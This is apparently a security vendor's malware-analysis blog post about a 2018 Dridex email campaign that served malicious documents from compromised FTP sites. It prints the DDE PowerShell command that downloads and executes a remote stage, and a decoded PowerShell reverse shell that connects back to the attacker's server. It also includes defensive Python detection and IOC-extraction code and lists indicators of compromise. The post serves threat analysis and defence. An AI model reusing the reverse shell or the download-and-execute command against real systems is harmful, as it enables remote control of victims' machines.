X-Labs
January 18, 2018

New year, new look - Dridex via compromised FTP

Roland Dela Paz Security Researcher
Ran Mosessco Principal Security Researcher

Forcepoint Security Labs have recently observed a peculiar email campaign distributing a variant of the Dridex banking trojan. Instead of the usual HTTP link, the campaign used compromised FTP sites as the download locations for its malicious documents. Because the links take the form ftp://username:password@host/path, every email also exposed the credentials of the compromised FTP sites to anyone who received it.

The malicious emails were distributed just before 12:00 UTC on 17 January 2018 and remained active for approximately seven hours. The emails were sent primarily to .COM top level domains (TLDs); the second, third and fourth most affected TLDs suggest that the major regional targets were France, the UK, and Australia respectively.

The sending domains were themselves compromised accounts. The local part of the sender address rotated through the following values, perhaps to make the emails resemble routine automated notifications to unsuspecting recipients:

admin@
billing@
help@
info@
mail@
no-reply@
sale@
support@
ticket@

Below is a sample malicious email:

The campaign used two types of documents. The first is a DOC file that abuses Dynamic Data Exchange (DDE) to execute the following shell command, which fetches and runs the next stage. Note the carets in pow^ers^hell.e^xe: cmd.exe strips them as escape characters before executing the line, so PowerShell still launches while naive string matches on "powershell" fail:

c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c IEX(New-Object Net.WebClient).DownloadString('http://185.176.221[.]146/download/s/GTz')

The above link returns a base64-encoded string. Despite the DownloadString call, what it decodes to is not a downloader but a PowerShell reverse shell: it connects back to the same IP on TCP port 443, executes whatever it receives with Invoke-Expression (iex), returns the output over the socket, and reconnects after ten seconds if the connection drops:

# Outer loop: reconnect forever, until the process is killed.
while (1 -eq 1)
{
  try
  {
    $ErrorActionPreference = 'Continue';
    # Connect back to the C2 (the same host that served this stage) on TCP/443.
    $zcl = New-Object Net.Sockets.TCPClient("185.176.221[.]146", 443);
    $zm = ($zcl.GetStream());
    # 256-byte receive buffer.
    [byte[]]$bt = 0..255 | % { 0 };
    # Read a command from the socket, run it with Invoke-Expression and send
    # stdout+stderr back; the loop ends when the server closes the connection.
    while (($i = $zm.Read($bt, 0, $bt.Length)) -ne 0)
    {
      $d = (New-Object Text.ASCIIEncoding).GetString($bt, 0, $i);
      $st = ([text.encoding]::ASCII).GetBytes((iex $d 2>&1));
      $zm.Write($st, 0, $st.Length);
      $zm.Flush()
    }
  }
  catch
  {
    # Connection refused or dropped: wait ten seconds, clean up, and retry.
    Start-Sleep -s 10;
    if ($zcl.Connected)
    {
      $zcl.Close();
    }
  }
}
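The following is an added example and not code from the Forcepoint write-up: it takes a stage-1 command line in the shape of the DDE payload above, removes the cmd.exe caret obfuscation, decodes the base64 stage it fetches, and scores both against the indicators a detection rule would key on (hidden window, execution-policy bypass, DownloadString into IEX for the launcher; TCPClient plus IEX of received data for the reverse shell). The command string and the stage-2 script are constructed to mirror the samples on the page, with the documentation address 203.0.113.10 standing in for the real IP; it is assumed that the served stage is standard base64 of the script text (UTF-8 or, as with -EncodedCommand, UTF-16LE).

```python
"""Added example (not from the Forcepoint post): normalise and score the
DDE launcher command and its base64-encoded second stage.  Samples are
constructed; 203.0.113.10 is a documentation address, not the real C2."""
import base64
import re


def normalise_cmd(cmdline: str) -> str:
    """cmd.exe treats '^' as an escape and discards it before executing the
    line, so pow^ers^hell.e^xe still launches PowerShell.  Strip carets the
    same way cmd.exe does before matching anything."""
    return cmdline.replace("^", "")


# Stage-1 (launcher) indicators, matched case-insensitively against the
# normalised command line.
STAGE1_INDICATORS = [
    ("powershell_launch", r"powershell(\.exe)?\b"),
    ("hidden_window", r"-w(indowstyle)?\s+hidden"),
    ("bypass_policy", r"-exec(utionpolicy)?\s+bypass"),
    ("no_profile", r"-nop(rofile)?\b"),
    ("download_string", r"downloadstring\s*\("),
    ("iex", r"\biex\b|invoke-expression"),
]

# Stage-2 indicators: a raw TCP client whose received bytes are handed to
# Invoke-Expression is the signature of a PowerShell reverse shell.
STAGE2_INDICATORS = [
    ("tcp_client", r"net\.sockets\.tcpclient"),
    ("stream_read", r"getstream\s*\(\)"),
    ("exec_received", r"\biex\b|invoke-expression"),
    ("reconnect_loop", r"while\s*\(\s*1\s+-eq\s+1\s*\)|start-sleep"),
]


def match_indicators(text, indicators):
    """Names of the indicators whose pattern occurs in text."""
    return [name for name, pat in indicators if re.search(pat, text, re.IGNORECASE)]


def decode_stage(b64: str) -> str:
    """Decode a base64 stage.  Assumption: the script is delivered as UTF-8
    text or as UTF-16LE (the -EncodedCommand convention); NUL bytes mark
    the latter."""
    raw = base64.b64decode(b64)
    return raw.decode("utf-16-le") if b"\x00" in raw else raw.decode("utf-8")


def analyse(cmdline: str, stage2_b64: str) -> dict:
    """Score a launcher command line and the stage it downloads."""
    norm = normalise_cmd(cmdline)
    stage2 = decode_stage(stage2_b64)
    stage2_hits = match_indicators(stage2, STAGE2_INDICATORS)
    return {
        "normalised": norm,
        "download_urls": re.findall(r"https?://[^\s'\")]+", norm),
        "stage1_hits": match_indicators(norm, STAGE1_INDICATORS),
        "stage2_hits": stage2_hits,
        # Connect-back plus execution of received data is enough to call it.
        "reverse_shell": {"tcp_client", "exec_received"} <= set(stage2_hits),
    }


# Constructed stage-1 command in the shape of the DDE payload (placeholder host).
SAMPLE_CMD = (
    r"c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && "
    r"pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile "
    r"-c IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.10/download/s/GTz')"
)

# Constructed stage 2: the same reverse-shell structure as the decoded sample,
# pointing at the placeholder host, base64-encoded as a server would serve it.
SAMPLE_STAGE2 = base64.b64encode(
    b'while (1 -eq 1) { try { '
    b'$c=New-Object Net.Sockets.TCPClient("203.0.113.10",443); $s=$c.GetStream(); '
    b'[byte[]]$b=0..255|%{0}; '
    b'while(($i=$s.Read($b,0,$b.Length)) -ne 0) { '
    b'$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i); '
    b'$o=([text.encoding]::ASCII).GetBytes((iex $d 2>&1)); $s.Write($o,0,$o.Length); $s.Flush() } '
    b'} catch { Start-Sleep -s 10; if($c.Connected) { $c.Close() } } }'
).decode()

# Constructed benign stage for comparison: no network or execution indicators.
BENIGN_STAGE2 = base64.b64encode(b"Get-Date | Out-File C:\\temp\\date.txt").decode()


if __name__ == "__main__":
    result = analyse(SAMPLE_CMD, SAMPLE_STAGE2)
    print("normalised:", result["normalised"])
    print("urls:      ", result["download_urls"])
    print("stage 1:   ", result["stage1_hits"])
    print("stage 2:   ", result["stage2_hits"], "reverse shell:", result["reverse_shell"])
```

Run over real telemetry, the command line comes from process-creation logging (the parent is WINWORD.EXE for a DDE launch) and the stage from a proxy or sandbox capture; the caret stripping matters because the same obfuscation defeats simple "powershell.exe" matches in many email-gateway and EDR rules.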

The second type is an XLS file with a macro that downloads Dridex from the following location:

hxxp://theairlab[.]co.za/KJHdey3

The downloaded file is written to the user's temporary directory and then executed using the following command:

cmd.exe /c START "" C:\Users\<redacted>\AppData\Local\Temp\vanilaice8.exe

Analysis

The compromised servers do not appear to be running the same FTP software, so a single vulnerability in one FTP server product is unlikely to explain the compromises; it seems more likely that the credentials were obtained some other way, for example through credential theft or reuse.

The perpetrators of the campaign do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and therefore view these assets as disposable. Equally, if a compromised site is used by multiple actors it also makes attribution harder for security professionals and law enforcement.
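Because the download links carry the FTP username and password in the URL, the first thing an incident responder wants from one of these emails is the list of exposed accounts (to notify the site owners) and a credential-free, defanged set of indicators (to share). The following is an added example, not part of the Forcepoint write-up: it parses ftp:// links out of an email body, records whether each one embeds credentials, and produces both outputs. The email body is constructed, and its hostnames and the webmaster:Passw0rd! credential pair are placeholders.

```python
"""Added example (not from the Forcepoint post): extract ftp:// links from
a lure email, flag the ones that embed credentials, and build shareable
indicators.  The sample email is constructed with placeholder hosts."""
import re

# ftp://[user:password@]host[:port][/path].  The host is accepted in live
# ("a.b") or defanged ("a[.]b") form so the same code runs over IOC lists.
FTP_URL = re.compile(
    r"ftp://(?:(?P<user>[^:/@\s]+):(?P<password>[^@\s]*)@)?"
    r"(?P<host>[^/\s:]+)(?::(?P<port>\d+))?(?P<path>/[^\s\"'<>]*)?",
    re.IGNORECASE,
)


def refang(host: str) -> str:
    return host.replace("[.]", ".")


def defang(host: str) -> str:
    return refang(host).replace(".", "[.]")


def extract_ftp_links(text: str) -> list:
    """One record per ftp:// link.  The password is deliberately not kept:
    these records end up in tickets and reports."""
    links = []
    for m in FTP_URL.finditer(text):
        links.append({
            "host": refang(m.group("host")).lower(),
            "port": int(m.group("port")) if m.group("port") else 21,
            "path": m.group("path") or "/",
            "has_credentials": m.group("user") is not None,
            "user": m.group("user"),
        })
    return links


def to_indicators(links) -> list:
    """Defanged ftp://host/path strings, credentials dropped, deduplicated."""
    return sorted({f"ftp://{defang(l['host'])}{l['path']}" for l in links})


def exposed_accounts(links) -> dict:
    """host -> usernames seen in cleartext; this is what goes to the site
    owner so the right accounts get their passwords rotated."""
    accounts = {}
    for l in links:
        if l["has_credentials"]:
            accounts.setdefault(l["host"], set()).add(l["user"])
    return accounts


# Constructed lure body: two credential-bearing links (one already defanged,
# one live) and one ordinary anonymous FTP link for contrast.
SAMPLE_EMAIL = """\
Please find the scanned document at the link below.
ftp://webmaster:Passw0rd!@www.example[.]com/httpdocs/docs/scan_17.01.doc
Alternative copy: ftp://webmaster:Passw0rd!@www.example.com/httpdocs/docs/scan_17.01.xls
Public mirror (no credentials): ftp://ftp.example[.]net/pub/readme.txt
"""


if __name__ == "__main__":
    found = extract_ftp_links(SAMPLE_EMAIL)
    for link in found:
        print(link)
    print("indicators:", to_indicators(found))
    print("exposed accounts:", exposed_accounts(found))
```

The password capture group exists only so the regex consumes the userinfo correctly; it is never copied into the output, which keeps the resulting IOC list safe to paste into a report or a blocklist. A password containing "@" would not be matched by this pattern, which is an accepted limitation of the constructed example.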

Multiple attributes of the campaign suggest that it may be coming from the Necurs botnet:

  • The domains used for distribution were already in our records as compromised domains used in previous Necurs campaigns;
  • Necurs is historically known to spread Dridex;
  • The document downloaders are also similar to those used by Necurs in the past;
  • The download locations of the XLS file also follow the traditional Necurs format.

However, the volume of this particular campaign is very low compared to typical Necurs campaigns. Necurs typically sends out millions of emails per campaign, while this campaign was recorded sending just over 9.5K emails in total. Necurs has recently been recorded using malicious links (as opposed to malicious attachments) to distribute Dridex, but the switch to FTP-based download URLs is an unexpected change.

Protection statement

Forcepoint customers are protected against this threat at the following stages of attack:

Stage 2 (Lure) - Malicious e-mails associated with this attack are identified and blocked.
Stage 5 (Dropper File) - Malicious files are prevented from being downloaded.
Stage 6 (Call Home) - Attempts by Dridex to contact its C&C server are blocked.

Conclusion

Cybercriminals constantly update their attack methods to try and ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to evade email gateways and network policies that treat FTP servers as trusted locations. The presence of FTP credentials in the emails highlights the importance of rotating passwords, and in particular of resetting them once a compromise is suspected: a compromised account may be abused multiple times by different actors for as long as the credentials remain the same.

Although there are attributes of the campaign that suggest it is coming from Necurs, its size of roughly 9.5K emails is unremarkable for a generic malspam run and very small by Necurs' standards. Given Necurs' typical association with very large campaigns, the reason for this remains something of a mystery.

Forcepoint Security Labs will continue to monitor for similar campaigns in the future and update information here as necessary.

Indicators of Compromise

FTP URLs:

ftp://{redacted}:{redacted}@www.emtech-canada[.]com/docs
ftp://{redacted}:{redacted}@basedow-bilder[.]de/httpdocs/docs
ftp://{redacted}:{redacted}@charter-base[.]de/httpdocs/docs
ftp://{redacted}:{redacted}@peopleiknow[.]org/httpdocs/docs
ftp://{redacted}:{redacted}@schwellenwertdaten[.]de/httpdocs/docs/
ftp://{redacted}:{redacted}@motifahsap[.]com/httpdocs/docs
ftp://{redacted}:{redacted}@basedow-bilder[.]de/httpdocs/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@www.emtech-canada[.]com/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@motifahsap[.]com/httpdocs/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@charter-base[.]de/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@basedow-bilder[.]de/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@www.emtech-canada[.]com/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@charter-base[.]de/httpdocs/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@motifahsap[.]com/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@schwellenwertdaten[.]de/httpdocs/docs/scan_17.01.doc
ftp://{redacted}:{redacted}@schwellenwertdaten[.]de/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@peopleiknow[.]org/httpdocs/docs/scan_17.01.xls
ftp://{redacted}:{redacted}@peopleiknow[.]org/httpdocs/docs/scan_17.01.doc

XLS macro (SHA1):

5697b0e3123b7d9511568d153e5545eb0ec5c906
a1843ecc6f0c3f3fe0a3ef13d81d69abfaf6d4c9
7b7cdd64f0e66776303b4c09eefbac23471a58f1

DOC DDE abuse (SHA1):

e6347d6245308e104a1f4225cdd2c814cff1a63a

Dridex download locations:

theairlab[.]co.za/KJHdey3
185.176.221[.]146

Dridex (SHA1):

23b84ed99d9761ce4ffdf928e472ee03afb3615f

Dridex C2s:

69.90.132[.]196:443
89.171.146[.]30:4143
108.166.114[.]38:4443
138.197.255[.]18:4143
